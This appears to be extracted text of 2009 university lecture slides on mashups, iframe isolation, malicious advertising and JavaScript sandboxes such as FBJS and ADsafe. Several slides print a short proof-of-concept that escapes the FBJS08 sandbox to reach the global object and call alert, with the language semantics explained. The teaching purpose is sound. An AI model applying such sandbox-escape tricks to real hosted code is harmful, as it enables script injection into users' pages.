mashups and language-based isolation john mitchell cs 142 winter 2009

Mashups and Language-Based Isolation

John Mitchell

CS 142 Winter 2009

Mashups

Advertisements

Social Networking Sites

Third-party content: Ads

Customer

accounts

Advertising network

Third-party content: Apps

User data

User-supplied application

Why Use Frames

Isolation Different frames can

represent different principals Same-origin policy: frame

can only read or modify frames from same scheme/host/port

Delegation Frame can draw only on its

own rectangle

Modularity Reuse the same content in

multiple places

Failure containment Parent may work even if

frame is slow to load or broken

src = 7.gmodules.com/...name = remote_iframe_7

src = google.com/…name = awglogin

Why Not To Use Frames

Inconvenient Container does fit content Quirky browser behavior

(history, sound) Performance impact

Security Concerns Frame hijacking Browser exploits

Inability to Communicate

Cannot send messages to cross-domain frames

Alternatives: Flash Rewriting: FBJS, ADsafe, Caja

postMessage

frames[0].postMessage("Hello world.");

document.addEventListener("message", receiver);function receiver(e) { if (e.domain == "example.com") { if (e.data == "Hello world") e.source.postMessage("Hello", e.domain, e.uri); }}

Referer Suppression Experiment

Measure how often Referer suppressed Placed a JavaScript advertisement for $200 283,945 impressions

Remember this from Lecture 12 by Collin?

How does this work?

Content

Ad

Advertiser Ad Network Publisher Browser

Ad Ad

Content

Ad

Ad Server

Can retrieve “image”that is part of ad

“Zero-click attacks”

Clients vulnerable Malware can attack

browser implementation errors

Browser-resident malware can use intended functionality to carry out malicious attacts

Easy to place $30 in advertisements

reach 50,000 browsers

Brian Krebs on Computer Security

Hackers Exploit Adobe Reader Flaw

Security Fix has learned that … security hole in … Adobe Reader … is actively being exploited to break into Microsoft Windows computers.According to information released Friday by iDefense, … Web site administrators … spotted hackers taking advantage of the flaw on Jan. 20, 2008, when tainted banner ads were identified that served specially crafted Acrobat PDF files designed to exploit the hole and install malicious software .

Ad serves PDF file that installs Zonebac, modifies search engine results

Problems with advertisements

Ad network, publisher have incentives to show ads Could place ads in iframe Rules out more profitable floating ads, etc.

Ad network and publisher can try to screen ads Yahoo! AdSafe Google Caja

Some limitations in current web Ads may contain links to “images” that are part of ad

Important to remember This is a very effective way to reach victims: $30-50 per 1000 User does not have to click on anything to run malicious code

14

Sandbox

A safe place for kids to play without hurting each other or anyone else

Possible approach

Goal Write a static analyzer to check untrusted

JavaScript and determine if it is malicious

Solvable? Very difficult because of functions that can

convert string to code and vice versa, for eg : eval

More likely to have a solution Find a well-defined and meaningful subset

of JavaScript for which this is solvable Prohibit problematic functions like eval

Some JavaScript examples

Use of this inside functions

Implicit conversions

var b = 10;var f = function(){ var b = 5;

function g(){var b = 8; return this.b;};g();}

var result = f();

var y = "a";var x = {toString : function(){ return y;}}x = x + 10;js> "a10"

// has as value 10

// implicit call toString

Sometimes tricky

Which declaration of g is used?

String computation of property names

for (p in o){....}, eval(...), o[s] allow strings to be used as code and vice versa

var f = function(){ var a = g();function g() { return 1;};function g() { return 2;};var g = function() { return 3;}return a;}

var result = f(); // has as value 2

var m = "toS"; var n = "tring";Object.prototype[m + n] = function(){return undefined};

Facebook FBJS

Subset of JavaScript for Facebook applications Application code is fetched from the

publisher's (untrusted) server and embedded as a subtree of the page.

Not placed in an Iframe.

Application code written is statically checked to see if it is valid FBJSFBJS code is re-written and certain run-time checks are added

FBJS restrictions

Security Goal Restrict access: Document Object Model (DOM), global

object Prevent clashes with other applications

Method 1: Filtering Forbid eval, with Disallow explicit access to properties (via the dot

notation o.p) valueOf, __parent__ , constructor.

Method 2: Rewriting Add application specific prefix to all top-level identiers.

Example : o.p is renamed to a1234_o.p Separate effective namespace of an application from

others

More about FBJS08

Some details of rewriting: this is re-written to ref(this)

ref is a function dened by the host (Facebook) in the global object

ref(x) = x if x 6= window else ref(x) = null Prevents application code form accessing the global

object. o[p] gets rewritten to o[idx(p)].

Returns error if p is a black-listed property, such as "__x__“

Facebook also provides libraries accessible within the application namespace, allow

applications to safely access certain parts of the global object.

Problem with FBJS08

Attack: Get a handle to the global object in the application code

Almost works var getthis = function() {return this;};

Except that this gets re-written to ref(this) and the code returns null.

But we can redefine ref itself ref is defined in the global object and application code is

disallowed from having handle to global object But can define a local ref in a local scope and defeat

FBJS08

try {throw (function() {return this;});}catch (f) {curr scp = f();}

Exploit code (now fixed!)

<a href="#" onclick="a()">Test A (Firefox and Safari)</a><script>var get_win = function get_scope(x){ if (x==0) {return this} else {get_scope(0).ref=function(x){return x}; return get_win(0)}};function a(){get_win(1).alert("Hacked!")}</script>

<a href="#" onclick="b()">Test B (Safari, Opera and Chrome)</a><script>function b(){ try {throw (function(){return this});} catch (get_scope){get_scope().ref=function(x){return x}; this.alert("Hacked!")}}</script>

Attack 1

ECMA-262 semantics for try{...} catch(f){...} says that whenever an exception is thrown:

New object o is created with property f pointing to the exception object

o is placed on top of the scope chain. (o does not have the activation object status).

The "this" of a function not defined in an activation object is the object containing it. In code above, this for get_scope resolves to o.Shadow the original ref by re-defining it in o.

try {throw (function(){return this});} catch (get_scope){get_scope().ref=function(x){return x};

Attack 2

ECMA-262 says that whenever a named recursive function f is created then the internal scope chain (fscp) of the function (environment pointer of the closure) is set to the current lexical scope with a dummy object (of) placed on top.

var get window = function f(x){if (x===0) {return this} else {f(x-1)};

Attack 2

When the function f is called, the current scope chain is replaced with fscp and an activation object for f is placed on top of itEvery recursive call to f will resolve to property f of the dummy object of (which is not an activation object)Accessing this inside f will resolve to of

Shadow the original ref by redefining it in of

var get window = function f(x){if (x===0) {return this} else {f(x-1)};

What is possible?

Filtering principle Subset of JavaScript: if program accesses property p, either p

appears textually in program, or is from list of “implicit” properties

Isolation principle 1 Subset of JavaScript: semantics-preserving capture-avoiding

renaming of identifiers (except names of predefined properties)

Isolation principle 2 Subset of JavaScript: no program can access any scope object

Isolation principle 3 Given a lists of forbidden properties PnoW and PnoRW , cannot write

properties in PnoW and cannot read or write properties in PnoRW

Rewriting principles Achieve some forms of isolation by restricting semantics

Isolation of property names (Jt)

Goal All property names that get accessed must appear

textually in the code

If the program does not contain eval, Function, o[..] etc which convert string to code

Then any property accessed is either in code or an implicit property access: toString, toNumber,

valueOf, length, prototype, constructor, message, arguments, Object, Array

Application If we want to prevent access to certain properties,

restrict to this sublanguage Jt and inspect code

Isolating scope objects (Js)

How can code in subset Jt access scope objects? Identifier this Object.prototype.valueOf, Array.prototype.sort

/concat/reverse can implicitly access this

Define subst Js of Jt Prohibit this, valueOf, sort, concat and reverse

Properties of Js Programs cannot access scope object Can rename variables; variable names can never

be accessed (explicitly) as properties But not variable with same name as native properties

Example:

Security Goal Restrict access: Document Object Model

(DOM), global object

Method 1: Filtering Forbid eval, with, ...

Method 2: Require special program idioms Access property p of object o by calling

ADSAFE.get(o, p)

Subtlety:

AdSafe restriction "All interaction with the trusted code must happen

only using the methods in the ADSafe object."

This may not be possible !// Somewhere in trusted codeObject.prototype.toString = function() { ... };...// Untrusted codevar o = {};o = o + “ “; // converts o to String

Bottom line: need to restrict definitions that occur in trusted code

Possible approach

Analyze the library of the host page Compute a blacklist PnoRW of security-

critical properties that could lead to security breach (How?)

Use subset Js + Filter for PnoRW

Conclusion

Modern sites incorporate third-party content Advertisements Applications

Third-party content must be isolated Or expose everyone to easy malicious attacks

Two basic approaches Use browser mechanism, such as iframes Filter, rewrite, and restrict execution of untrusted

content

Language-based sandboxing is tricky Subtle problems with recent methods Progress on reliable foundations is possible

Web Advertising

Deliver advertisements to viewers via Web

More effective and more profitable if user profile is known

Source: U Texas iSchool student study, www.ischool.utexas.edu/~i385e/studentsPPT/fogle_IA&WebAdv.ppt

Web ad placement and type Ad positions

Dark orange (strong), light yellow (weak)

Ads near rich content and navigation, and at the top-left do better

Ad types Banner Sidebar Pop-ups, pop-unders Floating Unicast

Banner

HTML code loads a specific website

Varies in content and shape

Horizontal

50 cents/ 1000

Sidebar

Skyscraper

Vertical

2-3 times larger than banner

Harder to scroll it off page

$1.00 - $1.50/ 1000

Pop-ups

Opens in its own window

Obscures the page your viewing

Forced to close or move it

Pop-unders

Opens under the content your viewing

Less intrusive than pop-up

Both are more effective than banner

Banners: 2-5 clicks/ 1000

Pop-ups: 30 clicks/ 1000

Can cost 4-10 times more than banner

Floating

Float or fly over page 5-30s

Obscure view; block mouse input

Gets attention: animation & sound

Powerful branding tool - hard to ignore

30 clicks/1000

$3 - $30/ 1000

Unicast

TV commercials that run in pop-up

10-30s

Same branding power as TV commercial + being able to go to website

50 clicks/1000

$30/1000From AOL.com

Web Publishing and Advertising

45

Content

Ad

Advertiser Ad Network Publisher Browser

AdAd

Content

Ad

Attacker Intermediary Intermediary Victim

mashups and language-based isolation john mitchell cs 142 winter 2009

Documents